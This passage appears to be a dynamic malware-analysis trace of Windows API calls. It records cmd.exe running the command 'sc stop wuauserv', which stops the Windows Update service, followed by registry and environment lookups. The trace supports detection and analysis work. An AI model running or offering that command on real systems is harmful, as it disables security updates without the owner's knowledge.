Protect=0x1, Type=0x0)) returned 0x1c [0020.740] GetConsoleOutputCP () returned 0x1b5 [0020.740] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0020.740] SetConsoleCtrlHandler (HandlerRoutine=0x4a52e72a, Add=1) returned 1 [0020.740] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.740] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0020.740] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.740] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0020.740] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.741] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0020.741] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.741] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0020.741] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.741] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0020.741] GetEnvironmentStringsW () returned 0x3a2020* [0020.741] FreeEnvironmentStringsW (penv=0x3a2020) returned 1 [0020.741] GetEnvironmentStringsW () returned 0x3a2020* [0020.742] FreeEnvironmentStringsW (penv=0x3a2020) returned 1 [0020.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34e6f4 | out: phkResult=0x34e6f4*=0x68) returned 0x0 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x0, lpData=0x34e700*=0x0, lpcbData=0x34e6f8*=0x1000) returned 0x2 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x4, lpData=0x34e700*=0x1, lpcbData=0x34e6f8*=0x4) returned 0x0 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x0, lpData=0x34e700*=0x1, lpcbData=0x34e6f8*=0x1000) returned 0x2 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x4, lpData=0x34e700*=0x0, lpcbData=0x34e6f8*=0x4) returned 0x0 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x4, lpData=0x34e700*=0x40, lpcbData=0x34e6f8*=0x4) returned 0x0 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x4, lpData=0x34e700*=0x40, lpcbData=0x34e6f8*=0x4) returned 0x0 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x0, lpData=0x34e700*=0x40, lpcbData=0x34e6f8*=0x1000) returned 0x2 [0020.742] RegCloseKey (hKey=0x68) returned 0x0 [0020.742] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34e6f4 | out: phkResult=0x34e6f4*=0x68) returned 0x0 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x0, lpData=0x34e700*=0x40, lpcbData=0x34e6f8*=0x1000) returned 0x2 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x4, lpData=0x34e700*=0x1, lpcbData=0x34e6f8*=0x4) returned 0x0 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x0, lpData=0x34e700*=0x1, lpcbData=0x34e6f8*=0x1000) returned 0x2 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x4, lpData=0x34e700*=0x0, lpcbData=0x34e6f8*=0x4) returned 0x0 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x4, lpData=0x34e700*=0x9, lpcbData=0x34e6f8*=0x4) returned 0x0 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x4, lpData=0x34e700*=0x9, lpcbData=0x34e6f8*=0x4) returned 0x0 [0020.742] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34e6fc, lpData=0x34e700, lpcbData=0x34e6f8*=0x1000 | out: lpType=0x34e6fc*=0x0, lpData=0x34e700*=0x9, lpcbData=0x34e6f8*=0x1000) returned 0x2 [0020.742] RegCloseKey (hKey=0x68) returned 0x0 [0020.742] time (in: timer=0x0 | out: timer=0x0) returned 0x5a0b3db4 [0020.742] srand (_Seed=0x5a0b3db4) [0020.742] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop wuauserv" [0020.742] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop wuauserv" [0020.743] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.743] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a2028, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0020.743] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.743] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.743] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.743] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0020.743] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0020.743] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0020.743] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0020.743] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0020.743] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0020.743] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0020.743] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0020.743] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0020.743] GetEnvironmentStringsW () returned 0x3a2238* [0020.743] FreeEnvironmentStringsW (penv=0x3a2238) returned 1 [0020.743] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0020.743] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.743] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0020.744] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0020.744] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0020.744] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0020.744] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0020.744] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0020.744] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0020.744] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0020.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x34f4c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.744] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x34f4c0, lpFilePart=0x34f4bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f4bc*="Desktop") returned 0x25 [0020.744] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0020.745] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34f23c | out: lpFindFileData=0x34f23c) returned 0x3a1ea0 [0020.745] FindClose (in: hFindFile=0x3a1ea0 | out: hFindFile=0x3a1ea0) returned 1 [0020.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34f23c | out: lpFindFileData=0x34f23c) returned 0x3a1ea0 [0020.745] FindClose (in: hFindFile=0x3a1ea0 | out: hFindFile=0x3a1ea0) returned 1 [0020.745] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0020.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34f23c | out: lpFindFileData=0x34f23c) returned 0x3a1ea0 [0020.745] FindClose (in: hFindFile=0x3a1ea0 | out: hFindFile=0x3a1ea0) returned 1 [0020.745] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0020.745] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0020.745] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0020.745] GetEnvironmentStringsW () returned 0x3a40a8* [0020.745] FreeEnvironmentStringsW (penv=0x3a40a8) returned 1 [0020.745] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.746] GetConsoleOutputCP () returned 0x1b5 [0020.746] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0020.746] GetUserDefaultLCID () returned 0x409 [0020.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a534950, cchData=8 | out: lpLCData=":") returned 2 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x34f600, cchData=128 | out: lpLCData="0") returned 2 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x34f600, cchData=128 | out: lpLCData="0") returned 2 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x34f600, cchData=128 | out: lpLCData="1") returned 2 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a534940, cchData=8 | out: lpLCData="/") returned 2 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a534d80, cchData=32 | out: lpLCData="Mon") returned 4 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a534d40, cchData=32 | out: lpLCData="Tue") returned 4 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a534d00, cchData=32 | out: lpLCData="Wed") returned 4 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a534cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a534c80, cchData=32 | out: lpLCData="Fri") returned 4 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a534c40, cchData=32 | out: lpLCData="Sat") returned 4 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a534c00, cchData=32 | out: lpLCData="Sun") returned 4 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a534930, cchData=8 | out: lpLCData=".") returned 2 [0020.747] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a534920, cchData=8 | out: lpLCData=",") returned 2 [0020.747] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0020.748] GetConsoleTitleW (in: lpConsoleTitle=0x3a2db0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.748] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0020.748] GetProcAddress (hModule=0x76a20000, lpProcName="CopyFileExW") returned 0x76a53b92 [0020.748] GetProcAddress (hModule=0x76a20000, lpProcName="IsDebuggerPresent") returned 0x76a34a5d [0020.748] GetProcAddress (hModule=0x76a20000, lpProcName="SetConsoleInputExeNameW") returned 0x76a4a79d [0020.749] _wcsicmp (_String1="sc", _String2=")") returned 74 [0020.749] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0020.749] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0020.749] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0020.749] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0020.749] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0020.749] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0020.750] GetConsoleTitleW (in: lpConsoleTitle=0x34f2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.750] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0020.750] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0020.750] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0020.750] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0020.750] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0020.750] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0020.750] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0020.750] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0020.750] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0020.750] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0020.750] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0020.750] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0020.750] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0020.750] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0020.750] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0020.750] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0020.750] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0020.750] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0020.751] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0020.751] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0020.751] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0020.751] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0020.751] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0020.751] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0020.751] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0020.751] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0020.751] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0020.751] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0020.751] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0020.751] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0020.751] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0020.751] _wcsicmp (_String1="sc", _String2="START") returned -17 [0020.751] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0020.751] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0020.751] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0020.751] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0020.751] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0020.751] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0020.751] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0020.751] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0020.751] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0020.751] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0020.751] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0020.751] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0020.751] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0020.751] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0020.751] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0020.751] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0020.751] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0020.751] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0020.751] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0020.751] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0020.751] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0020.751] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0020.751] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0020.751] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0020.751] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0020.752] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0020.752] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0020.752] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0020.752] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0020.752] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0020.752] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0020.752] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0020.752] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0020.752] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0020.752] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0020.752] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0020.752] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0020.752] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0020.752] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0020.752] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0020.752] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0020.752] _wcsicmp (_String1="sc", _String2="START") returned -17 [0020.752] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0020.752] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0020.752] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0020.752] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0020.752] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0020.752] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0020.752] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0020.752] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0020.752] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0020.752] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0020.752] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0020.752] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0020.752] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0020.752] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0020.753] SetErrorMode (uMode=0x0) returned 0x0 [0020.753] SetErrorMode (uMode=0x1) returned 0x0 [0020.753] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3907f8, lpFilePart=0x34ee18 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34ee18*="Desktop") returned 0x25 [0020.753] SetErrorMode (uMode=0x0) returned 0x1 [0020.753] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.753] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0020.757] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.760] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.760] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x34eb94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34eb94) returned 0xffffffff [0020.760] GetLastError () returned 0x2 [0020.760] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc", fInfoLevelId=0x1, lpFindFileData=0x34eb94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34eb94) returned 0xffffffff [0020.760] GetLastError () returned 0x2 [0020.760] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.760] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x34eb94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34eb94) returned 0x3a3450 [0020.761] FindClose (in: hFindFile=0x3a3450 | out: hFindFile=0x3a3450) returned 1 [0020.761] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x34eb94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34eb94) returned 0xffffffff [0020.761] GetLastError () returned 0x2 [0020.761] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x34eb94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34eb94) returned 0x3a3450 [0020.761] FindClose (in: hFindFile=0x3a3450 | out: hFindFile=0x3a3450) returned 1 [0020.761] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0020.761] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0020.761] GetConsoleTitleW (in: lpConsoleTitle=0x34f08c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.761] InitializeProcThreadAttributeList (in: lpAttributeList=0x34ef14, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34efdc | out: lpAttributeList=0x34ef14, lpSize=0x34efdc) returned 1 [0020.761] UpdateProcThreadAttribute (in: lpAttributeList=0x34ef14, dwFlags=0x0, Attribute=0x60001, lpValue=0x34efd4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34ef14, lpPreviousValue=0x0) returned 1 [0020.761] GetStartupInfoW (in: lpStartupInfo=0x34eed0 | out: lpStartupInfo=0x34eed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0020.761] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0020.761] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0020.761] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0020.761] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.761] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.761] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.761] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0020.761] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned 